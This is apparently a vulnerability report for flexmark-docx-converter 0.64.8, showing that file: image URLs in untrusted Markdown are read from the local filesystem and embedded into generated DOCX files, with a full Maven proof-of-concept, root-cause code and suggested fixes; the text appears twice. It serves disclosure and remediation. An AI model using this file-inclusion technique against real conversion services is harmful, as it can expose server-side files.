Describe the bug
flexmark-docx-converter resolves Markdown image URLs and embeds the referenced image content into the generated DOCX. A file: URL supplied in attacker-controlled Markdown is treated as a valid image source and is read from the local filesystem by the default content resolver.
This means an application that converts untrusted Markdown to DOCX can be made to read a local file from the conversion environment and embed it into the generated .docx.
Affected component:
Affected version:
- Tested against
com.vladsch.flexmark:flexmark-docx-converter:0.64.8
To Reproduce
The following is a complete Maven reproducer. It creates a local proof PNG, references that local file from Markdown using a file: URL, renders the Markdown to DOCX, then opens the generated DOCX as a ZIP archive and verifies that the proof image was embedded under word/media/.
The PoC intentionally uses a locally generated proof image instead of reading any sensitive system file.
mkdir flexmark-docx-file-image-poc
cd flexmark-docx-file-image-poc
mkdir -p src/main/java
cat > pom.xml <<'EOF'
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>poc</groupId>
<artifactId>flexmark-docx-file-image-poc</artifactId>
<version>1.0-SNAPSHOT</version>
<properties>
<maven.compiler.source>11</maven.compiler.source>
<maven.compiler.target>11</maven.compiler.target>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<dependencies>
<dependency>
<groupId>com.vladsch.flexmark</groupId>
<artifactId>flexmark</artifactId>
<version>0.64.8</version>
</dependency>
<dependency>
<groupId>com.vladsch.flexmark</groupId>
<artifactId>flexmark-docx-converter</artifactId>
<version>0.64.8</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>exec-maven-plugin</artifactId>
<version>3.3.0</version>
<configuration>
<mainClass>Repro</mainClass>
</configuration>
</plugin>
</plugins>
</build>
</project>
EOF
cat > src/main/java/Repro.java <<'EOF'
import com.vladsch.flexmark.docx.converter.DocxRenderer;
import com.vladsch.flexmark.parser.Parser;
import com.vladsch.flexmark.util.ast.Node;
import com.vladsch.flexmark.util.data.MutableDataSet;
import org.docx4j.Docx4J;
import org.docx4j.openpackaging.packages.WordprocessingMLPackage;
import javax.imageio.ImageIO;
import java.awt.Color;
import java.awt.image.BufferedImage;
import java.io.File;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;
public class Repro {
public static void main(String[] args) throws Exception {
Files.createDirectories(Path.of("target", "local-proof"));
Path proofImage = Path.of("target", "local-proof", "flexmark-local-proof.png").toAbsolutePath();
writeProofImage(proofImage);
String fileUri = toFlexmarkFileUri(proofImage);
String markdown = "\n";
MutableDataSet options = new MutableDataSet();
Parser parser = Parser.builder(options).build();
DocxRenderer renderer = DocxRenderer.builder(options).build();
Node document = parser.parse(markdown);
WordprocessingMLPackage template = DocxRenderer.getDefaultTemplate();
renderer.render(document, template);
File output = Path.of("target", "flexmark-docx-file-image-poc.docx").toFile();
template.save(output, Docx4J.FLAG_SAVE_ZIP_FILE);
if (!docxContainsProofImage(output)) {
throw new IllegalStateException("The generated DOCX did not contain the local proof image");
}
System.out.println("Markdown input:");
System.out.println(markdown);
System.out.println("Generated DOCX: " + output.getAbsolutePath());
System.out.println("FLEXMARK_DOCX_LOCAL_FILE_INCLUSION_CONFIRMED");
}
private static String toFlexmarkFileUri(Path path) {
String normalized = path.toAbsolutePath().toString().replace(File.separatorChar, '/');
if (!normalized.startsWith("/")) {
normalized = "/" + normalized;
}
return "file:" + normalized;
}
private static void writeProofImage(Path path) throws Exception {
BufferedImage img = new BufferedImage(8, 8, BufferedImage.TYPE_INT_RGB);
for (int y = 0; y < 8; y++) {
for (int x = 0; x < 8; x++) {
int color;
if (x < 4 && y < 4) {
color = Color.RED.getRGB();
} else if (x >= 4 && y < 4) {
color = Color.GREEN.getRGB();
} else if (x < 4) {
color = Color.BLUE.getRGB();
} else {
color = Color.YELLOW.getRGB();
}
img.setRGB(x, y, color);
}
}
ImageIO.write(img, "png", path.toFile());
}
private static boolean docxContainsProofImage(File docx) throws Exception {
try (ZipFile zip = new ZipFile(docx)) {
return zip.stream()
.filter(entry -> entry.getName().startsWith("word/media/"))
.anyMatch(entry -> imageEntryMatches(zip, entry));
}
}
private static boolean imageEntryMatches(ZipFile zip, ZipEntry entry) {
try (InputStream input = zip.getInputStream(entry)) {
BufferedImage img = ImageIO.read(input);
if (img == null || img.getWidth() != 8 || img.getHeight() != 8) {
return false;
}
return sameRgb(img.getRGB(1, 1), Color.RED)
&& sameRgb(img.getRGB(6, 1), Color.GREEN)
&& sameRgb(img.getRGB(1, 6), Color.BLUE)
&& sameRgb(img.getRGB(6, 6), Color.YELLOW);
} catch (Exception e) {
return false;
}
}
private static boolean sameRgb(int actual, Color expected) {
return (actual & 0x00ffffff) == (expected.getRGB() & 0x00ffffff);
}
}
EOF
mvn -q compile exec:java
Resulting Output
The reproducer prints the attacker-controlled Markdown input and confirms that the local proof image was embedded into the generated DOCX:
Markdown input:

Generated DOCX: .../target/flexmark-docx-file-image-poc.docx
FLEXMARK_DOCX_LOCAL_FILE_INCLUSION_CONFIRMED
The generated DOCX contains the local proof image under word/media/. The reproducer verifies this by reading image entries from the DOCX ZIP archive and checking the expected pixel pattern.
Root cause
The default DocxLinkResolver treats image links as valid local content. With default options, if DOC_RELATIVE_URL and DOC_ROOT_URL are empty, it returns the original URL as LinkStatus.VALID:
if (docRelativeURL.isEmpty() && docRootURL.isEmpty()) {
return link.withStatus(LinkStatus.VALID)
.withUrl(url);
}
When root or relative URL options are configured, file:/ URLs are also explicitly accepted:
} else if (url.startsWith("file:/")) {
return link.withStatus(LinkStatus.VALID)
.withUrl(url);
}
The default FileUriContentResolver then reads valid file:/ URLs from the local filesystem:
if (resolvedLink.getStatus() == LinkStatus.VALID) {
String url = resolvedLink.getUrl();
if (url.startsWith("file:/")) {
File includedFile = new File(substring);
if (includedFile.isFile() && includedFile.exists()) {
return content.withContent(FileUtil.getFileContentBytesWithExceptions(includedFile))
.withStatus(LinkStatus.VALID);
}
}
}
Finally, image rendering loads those bytes and embeds the image into the DOCX:
ResolvedContent resolvedContent = docx.resolvedContent(resolvedLink);
if (resolvedContent.getStatus() == LinkStatus.VALID) {
image = ImageUtils.loadImageFromContent(resolvedContent.getContent(), resolvedLink.getUrl());
}
...
return newImage(docx, image, filenameHint, attributes, id1, id2, scale);
Expected behavior
file: URLs from Markdown image input should not be read and embedded by default when converting untrusted Markdown to DOCX.
Possible safe behaviors:
- reject
file: image URLs by default
- require an explicit opt-in option for local file embedding
- restrict local image reads to a configured safe base directory
- reject absolute paths and path traversal outside the configured document root
Impact
If a server-side or automated workflow converts attacker-controlled Markdown to DOCX, an attacker can cause the conversion process to read local image files and embed them into the resulting document.
The PoC uses a generated PNG for safety, but the same path reads any local file that ImageIO accepts as an image and that the conversion process can access. This may disclose local files from the conversion environment through the generated .docx.
Related issue
This is separate from #676. That issue concerns XXE in XML parsing helpers; this issue concerns Markdown image URL resolution and local file reads during DOCX image rendering.
Describe the bug
flexmark-docx-converterresolves Markdown image URLs and embeds the referenced image content into the generated DOCX. Afile:URL supplied in attacker-controlled Markdown is treated as a valid image source and is read from the local filesystem by the default content resolver.This means an application that converts untrusted Markdown to DOCX can be made to read a local file from the conversion environment and embed it into the generated
.docx.Affected component:
flexmark-docx-converterDocxRendererAffected version:
com.vladsch.flexmark:flexmark-docx-converter:0.64.8To Reproduce
The following is a complete Maven reproducer. It creates a local proof PNG, references that local file from Markdown using a
file:URL, renders the Markdown to DOCX, then opens the generated DOCX as a ZIP archive and verifies that the proof image was embedded underword/media/.The PoC intentionally uses a locally generated proof image instead of reading any sensitive system file.
Resulting Output
The reproducer prints the attacker-controlled Markdown input and confirms that the local proof image was embedded into the generated DOCX:
The generated DOCX contains the local proof image under
word/media/. The reproducer verifies this by reading image entries from the DOCX ZIP archive and checking the expected pixel pattern.Root cause
The default
DocxLinkResolvertreats image links as valid local content. With default options, ifDOC_RELATIVE_URLandDOC_ROOT_URLare empty, it returns the original URL asLinkStatus.VALID:When root or relative URL options are configured,
file:/URLs are also explicitly accepted:The default
FileUriContentResolverthen reads validfile:/URLs from the local filesystem:Finally, image rendering loads those bytes and embeds the image into the DOCX:
Expected behavior
file:URLs from Markdown image input should not be read and embedded by default when converting untrusted Markdown to DOCX.Possible safe behaviors:
file:image URLs by defaultImpact
If a server-side or automated workflow converts attacker-controlled Markdown to DOCX, an attacker can cause the conversion process to read local image files and embed them into the resulting document.
The PoC uses a generated PNG for safety, but the same path reads any local file that
ImageIOaccepts as an image and that the conversion process can access. This may disclose local files from the conversion environment through the generated.docx.Related issue
This is separate from #676. That issue concerns XXE in XML parsing helpers; this issue concerns Markdown image URL resolution and local file reads during DOCX image rendering.